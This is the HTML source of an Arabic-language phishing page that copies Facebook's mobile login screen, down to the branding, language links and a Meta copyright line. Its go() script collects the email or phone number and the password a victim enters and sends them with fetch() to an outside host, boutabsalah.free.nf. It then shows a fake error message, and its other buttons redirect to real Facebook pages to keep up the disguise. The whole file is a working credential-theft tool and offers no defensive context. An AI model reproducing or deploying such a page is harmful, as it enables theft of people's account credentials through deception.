<!DOCTYPE html>

<!------BY BOUTAB SALAH ------>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=Edge">
  <meta name="viewport" content="width=device-width, initial-scale=1">

  <title>تسجيل الدخول إلى فيسبوك</title>
  <link rel="stylesheet" href="bootstrap.min.css">
    <link rel="icon" type="image/png" href="4Kv5U5b1o3f.png">
  <!-- HTML -->
<style>
body,html{
  height: 100%;
  direction: rtl;
}
*{
  padding:0;
  margin:0;
#  border:1px solid red;
  
}
  .base{
    background: #ffffff;
    height:100%;
    width:100%;
    text-align: center;
  }
.one{
  background:#FEFAE0;
  padding: 0.5px;
  padding-right: 2px;
  color: #94893A;
  padding-top: 2px;
  border-bottom: 2px solid #ECE7A0;
  
}
.one h5{
  font-size: 0.80rem;
  margin-right: 3px;
  text-align: start;
}
.h3{
  color: #0865FE;
  text-align: center;
  font-weight: bold;
}
.data .input{
  background: #F5F6F8;
  border:1px solid white;
outline: 1.5px solid #E9E9E9;
font-size: 0.80rem;
width:90%;
padding:8px;
border-radius: 2px;


}

.data{
  text-align: center;
}
.data .input::placeholder{
  
  color: #757575;
}
.data input[type="submit"]{
  background: #1878F3;
  color:white;
  width:90%;
  border:none;
  font-size:1rem;
  padding:8px;
  border-radius: 4px;
  
}
.frgt{
  color: #4785D9;
  font-size: 0.80rem;
}
.or{
  width:100%;
  background: #E0E2E4;
position: relative;
  height:1px;
  text-align: center;
  z-index: 1;
}
.or:after{
  content:"أو";
  font-size: 0.80rem;
  color:#8D8F93;
  position: absolute;

  background: white;
  padding:18px;
  border-radius: 50%;
 transform: translate(20px,-25px);
 
 
}
button{
  background: white;
  border: 0.5px solid black;
  padding:4px;
  font-size: 0.90rem;
  width:70%;
  position: relative;
  z-index: 5;
  border-radius: 4px;
}
  .ul li span a{
    font-size: 0.80rem;
    color:  #586B95;
    text-decoration: none;
  }
.ul{
  width:50%;
  text-align: center;
  padding:0;
}
.ul li{
  list-style-type: none;
  
 
}
p{
  font-size: 0.70rem;
  color:#808080;
}
</style>

  <!-- Custom Styles -->
  <link rel="stylesheet" href="style.css">
</head>

<body>
<div class="base ">
  <div class="one mb-3" id="one">
    <h5 class="" id="tw">عليك تسجيل الدخول أولاً.</h5></div>
  
  <h3 class="mb-2 h3">facebook</h3>
  <div class="data">
  <input id="i1" class="shadow-sm input i1" type="email" placeholder="رقم الهاتف المحمول أو البريد الإلكتروني">

  <input id="i2" class="shadow-sm  mt-2 mb-3 input" type="password" placeholder="كلمة السر">
  <input onclick="go()"  type="submit" class="" value="تسجيل الدخول">
  <p onclick="frgtt()" class="frgt mt-2">هل نسيت كلمة السر ؟</p>
  </div>
  
  <div class="or mt-4">
    
  </div>
  <button onclick="ca()" class="mt-4 mb-5" type="submit">إنشاء حساب جديد</button>
  
  
  <div class="d-flex">
  <ul class="ul">
    <li><span class="text-muted"><a href="https://m.facebook.com/language/?next_uri=https%3A%2F%2Fm.facebook.com%2Flogin%2F%3Fnext%3Dhttps%253A%252F%252Fm.facebook.com%252Fbookmarks%252F%253Fwtsid%253Drdr_0zk8raHkRE4klX2vd%26ref%3Ddbl%26fl%26login_from_aymh%3D1%26refid%3D9&page_style=1&ref=dbl">العربية</a></span></li>
     <li><span class=""><a href="https://m.facebook.com/language/?next_uri=https%3A%2F%2Fm.facebook.com%2Flogin%2F%3Fnext%3Dhttps%253A%252F%252Fm.facebook.com%252Fbookmarks%252F%253Fwtsid%253Drdr_0zk8raHkRE4klX2vd%26ref%3Ddbl%26fl%26login_from_aymh%3D1%26refid%3D9&page_style=1&ref=dbl">ⵜⴰⵎⴰⵣⵉⵖⵜ</a></span></li>
     <li><span class=""><a href="https://m.facebook.com/language/?next_uri=https%3A%2F%2Fm.facebook.com%2Flogin%2F%3Fnext%3Dhttps%253A%252F%252Fm.facebook.com%252Fbookmarks%252F%253Fwtsid%253Drdr_0zk8raHkRE4klX2vd%26ref%3Ddbl%26fl%26login_from_aymh%3D1%26refid%3D9&page_style=1&ref=dbl">Español (España)</a></span></li>
      <li><span class=""><a href="https://m.facebook.com/language/?next_uri=https%3A%2F%2Fm.facebook.com%2Flogin%2F%3Fnext%3Dhttps%253A%252F%252Fm.facebook.com%252Fbookmarks%252F%253Fwtsid%253Drdr_0zk8raHkRE4klX2vd%26ref%3Ddbl%26fl%26login_from_aymh%3D1%26refid%3D9&page_style=1&ref=dbl">Deutsch</a></span></li>
    
    
  </ul>
  
  
  <ul class="ul">
    <li><span class=""><a href="https://m.facebook.com/language/?next_uri=https%3A%2F%2Fm.facebook.com%2Flogin%2F%3Fnext%3Dhttps%253A%252F%252Fm.facebook.com%252Fbookmarks%252F%253Fwtsid%253Drdr_0zk8raHkRE4klX2vd%26ref%3Ddbl%26fl%26login_from_aymh%3D1%26refid%3D9&page_style=1&ref=dbl">Français (France)</a></span></li>
     <li><span class=""><a href="https://m.facebook.com/language/?next_uri=https%3A%2F%2Fm.facebook.com%2Flogin%2F%3Fnext%3Dhttps%253A%252F%252Fm.facebook.com%252Fbookmarks%252F%253Fwtsid%253Drdr_0zk8raHkRE4klX2vd%26ref%3Ddbl%26fl%26login_from_aymh%3D1%26refid%3D9&page_style=1&ref=dbl">English (UK)</a></span></li>
     <li><span class=""><a href="https://m.facebook.com/language/?next_uri=https%3A%2F%2Fm.facebook.com%2Flogin%2F%3Fnext%3Dhttps%253A%252F%252Fm.facebook.com%252Fbookmarks%252F%253Fwtsid%253Drdr_0zk8raHkRE4klX2vd%26ref%3Ddbl%26fl%26login_from_aymh%3D1%26refid%3D9&page_style=1&ref=dbl">Português (Brasil)</a></span></li>

    
  </ul>
  
  
  </div>
  <p>حقوق النشر محفوظة Meta © ‏2024‏</p>
</div>

 <script>
 
   function frgtt(){
     location.href="https://m.facebook.com/recover/initiate/?privacy_mutation_token=eyJ0eXBlIjowLCJjcmVhdGlvbl90aW1lIjoxNzExMTIyMjgzLCJjYWxsc2l0ZV9pZCI6Mjg0Nzg1MTQ5MzQ1MzY5fQ%3D%3D&c=https%3A%2F%2Fm.facebook.com%2Flogin%2F%3Fnext%3Dhttps%253A%252F%252Fm.facebook.com%252Fbookmarks%252F%253Fwtsid%253Drdr_0zk8raHkRE4klX2vd%26ref%3Ddbl%26fl%26login_from_aymh%3D1%26refid%3D9&r&cuid&ars=facebook_login&lwv=100&ref=dbl";
   }
   function ca(){
     location.href="https://m.facebook.com/reg/?logger_id&is_two_steps_login=0&cid=103&next=https%3A%2F%2Fm.facebook.com%2Fbookmarks%2F%3Fwtsid%3Drdr_0zk8raHkRE4klX2vd&refsrc=deprecated&soft=hjk";
   }
   
   
   
function go(){
  
 var 
 input1 = document.getElementById('i1').value,
 input2 = document.getElementById('i2').value;
 if(input1==="" || input2===""){
var back = document.getElementById('one');
var text = document.getElementById('tw');
back.style.background="#FA3E3D";
text.style.color="white";
text.textContent= "البريد الإلكتروني أو رقم الهاتف الذي أدخلته لا يطابق أي حساب. ‏قم بالتسجيل للحصول على حساب.‏";
  }else{
    
    var data = "Email or number: "+input1 + "\nPassword: "+input2;
 console.log(data);
const dataToSend= [{"key":data}];

// خيارات الطلب
const requestOptions = {
    method: 'POST', // يمكن أن تكون GET أو POST أو أي طريقة أخرى تتطلبها الAPI
    headers: {
        'Content-Type': 'application/json' // نوع المحتوى الذي ترسله إلى الAPI
        // يمكنك أيضًا إضافة المزيد من الرؤوس إذا لزم الأمر، مثل رأس التوثيق
    },
    body: JSON.stringify(dataToSend) // تحويل البيانات إلى سلسلة JSON
};

// إرسال الطلب إلى الAPI باستخدام fetch
fetch('http://boutabsalah.free.nf/facebook/Login/get.php', requestOptions)
    .then(response => {
        if (!response.ok) {
            throw new Error('Network response was not ok');
        }
        return response.json(); // قراءة البيانات المردة من الAPI ك JSON
    })
    .then(data => {
        document.write("حدث خطأ في التسجيل");
        // يمكنك استخدام البيانات المردة هنا
    })
    .catch(error => {
          document.write('There was a problem with the fetch operation:', error);
    });
    
    
  }
  }
  </script>
  
  <!-------boutab Salah------>
</body>
</html>